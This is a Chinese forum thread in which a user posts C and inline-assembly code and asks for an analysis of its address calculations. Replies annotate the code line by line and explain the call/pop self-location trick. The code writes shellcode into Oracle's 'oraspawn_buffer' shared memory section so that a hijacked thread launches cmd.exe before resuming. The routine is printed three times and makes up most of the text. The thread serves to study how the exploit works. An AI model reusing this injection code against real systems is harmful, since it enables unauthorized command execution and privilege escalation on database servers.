21,458
社区成员
发帖
与我相关
我的任务
分享一段shellcode注入的汇编代码,谁能帮忙分析一下其中的地址变换,急用!在线等
rt,它是把shellcode代码放入共享内存的过程是怎样的?希望有地址变换过程的详细分析
#include <windows.h>
#include <stdio.h>
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100];
dwStrLen=strlen(sCommand);
hKernel=LoadLibrary("Kernel32.dll");
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");
strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");
HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff);
if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
return FALSE;
}
else
printf("Shared Section opened\n");
LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);
printf("Inserting shellcode...\n");
CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00
pop edi
mov esi, pCreateProc
mov [edi+0x0a], esi
mov esi, oldEIP
mov [edi+0x0e], esi
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
jmp Done
Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
pushad
mov eax, edx
add eax, 0x200
push eax //LPPROCESS_INFORMATION
add eax, 0x200
mov ebx, edx
xor bl, bl
lea ecx, [ebx+0x2f0]
lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea eax, [edx-0x47]
push eax // Command offset
push 0x0
call [edx-0x4f] // Call create process
popad
push [edx-0x4b] // old thread EIP
ret
End:
Done:
popad
}
return TRUE;
}
#include <windows.h>
#include <stdio.h>
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100];
dwStrLen=strlen(sCommand);
hKernel=LoadLibrary("Kernel32.dll");
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");
strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");
HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff);
if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
return FALSE;
}
else
printf("Shared Section opened\n");
LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);
printf("Inserting shellcode...\n");
CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00
pop edi
mov esi, pCreateProc
mov [edi+0x0a], esi
mov esi, oldEIP
mov [edi+0x0e], esi
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
jmp Done
Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
pushad
mov eax, edx
add eax, 0x200
push eax //LPPROCESS_INFORMATION
add eax, 0x200
mov ebx, edx
xor bl, bl
lea ecx, [ebx+0x2f0]
lea ebx, [eax+0x8]
mov [ebx], ecx //set windows station and desktop
push eax //LPSTARTUPINFO
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea eax, [edx-0x47]
push eax // Command offset
push 0x0
call [edx-0x4f] // Call create process
popad
push [edx-0x4b] // old thread EIP
ret
End:
Done:
popad
}
return TRUE;
}
...全文
请发表友善的回复…
发表回复
once_athief 2009-03-27
- 打赏
- 举报
恩,主要是我对汇编基本上一窍不通,现在总算明白了大体流程,占位指令比较有意思啊,是用shellcode代码自身占用的内存来保存变量??
killbug2004 2009-03-27
- 打赏
- 举报
BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID)
{
HMODULE hKernel;
FARPROC pCreateProc;
LPSTR sCommand="cmd.exe";
DWORD dwStrLen;
CHAR buff[100];
dwStrLen=strlen(sCommand);
hKernel=LoadLibrary("Kernel32.dll");
pCreateProc=GetProcAddress(hKernel,"CreateProcessA");
strcpy(buff, "Global\\*oraspawn_buffer_");
strncat(buff, oSID,50);
strcat(buff, "*");
HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); //打开共享内存
if (hMapFile == NULL) {
printf("Could not open Shared Section\n\n");
return FALSE;
}
else
printf("Shared Section opened\n");
LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0);//映射共享内存到自己的进程空间
printf("Inserting shellcode...\n");
CHAR sWinSta[]="WinSta0\\Default";
//copy shellcode
_asm {
pushad
lea esi, Shellcode
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi;shellcode代码长度
push esi;保存esi,备用
push edi
cld
rep movsb;将shellcode复制到共享内存中
pop edi
pop esi
push edi
lea ecx, CommandBuf;下面的CommandBuf,用来保存CreateProcessA的第二个参数
sub ecx, esi
add edi, ecx
mov esi, sCommand;"cmd.exe"
mov ecx, dwStrLen
rep movsb;拷贝"cmd.exe"到CommandBuf处
mov [edi], 0x00;字符串结尾标志'\0'
pop edi
mov esi, pCreateProc
mov [edi+0x0a], esi;[edi+0x0a]处保存CreateProcessA的地址
mov esi, oldEIP
mov [edi+0x0e], esi;[edi+0x0e]处保存原来执行的EIP
add edi, 0x2f0;复制"WinSta0\\Default"到[edi+0x2f0]
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
jmp Done
Shellcode:
jmp Start
// this gets overwritten
mov ax,0xffff;占位用
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555;这里的占位指令不会执行,是一个buffer,用来保存"cmd.exe"
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
Start:
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
pushad
mov eax, edx
add eax, 0x200
push eax //LPPROCESS_INFORMATION,lpProcessInformation
add eax, 0x200
mov ebx, edx
xor bl, bl;指向Shellcode开始的位置
lea ecx, [ebx+0x2f0];指向"WinSta0\\Default"
lea ebx, [eax+0x8] ;STARTUPINFO.lpDesktop
mov [ebx], ecx //set windows station and desktop,填充STARTUPINFO结构体的成员lpDesktop
push eax //LPSTARTUPINFO,lpStartupInfo
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
push 0x0
lea eax, [edx-0x47] //"cmd.exe"
push eax // Command offset
push 0x0
call [edx-0x4f] // Call create process
popad
push [edx-0x4b] // old thread EIP,返回原来的代码处继续执行
ret
End:
Done:
popad
}
return TRUE;
}这个代码不太难
changhe325 2009-03-27
- 打赏
- 举报
学习!
killbug2004 2009-03-27
- 打赏
- 举报
是的,那些指令不执行,运行时用来保存变量,因为内联汇编不支持定义变量的伪指令
once_athief 2009-03-26
- 打赏
- 举报
谢谢回复,下面这一段被jmp过了,什么时候会执行呢?还有这一段是在做什么?
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
// this gets overwritten
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
mov ax,0xffff
CommandBuf: // this gets overwritten
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
mov dword ptr[eax],0x55555555
once_athief 2009-03-26
- 打赏
- 举报
这里重定位技术是指它向指定地址写入shellcode的过程吗?
killbug2004 2009-03-26
- 打赏
- 举报
lea esi, Shellcode;这里是复制shellcode到内存共享区域
mov edi, lpMapAddress
add edi, 0x500
lea ecx, End
sub ecx, esi
push esi
push edi
cld
rep movsb
pop edi
pop esi
push edi
lea ecx, CommandBuf ;填充第一个参数
sub ecx, esi
add edi, ecx
mov esi, sCommand
mov ecx, dwStrLen
rep movsb
mov [edi], 0x00
pop edi ;填充参数
mov esi, pCreateProc
mov [edi+0x0a], esi
mov esi, oldEIP
mov [edi+0x0e], esi 填充参数
add edi, 0x2f0
lea esi, sWinSta
mov ecx, 0xf
cld
rep movsb
利用经典的重定位技术
cnzdgs 2009-03-26
- 打赏
- 举报
call getDelta
getDelta:
pop edx // Get shellcode/shared section pointer
call指令是把下一条指令的地址入栈,然后跳转到目标地址,在这里入栈的就是getDelta标号对应的地址,接下来pop edx是把这个地址弹出到edx里面,之后edx中保存的就是getDelta标号在当前进程中的地址。
getDelta:
pop edx // Get shellcode/shared section pointer
call指令是把下一条指令的地址入栈,然后跳转到目标地址,在这里入栈的就是getDelta标号对应的地址,接下来pop edx是把这个地址弹出到edx里面,之后edx中保存的就是getDelta标号在当前进程中的地址。
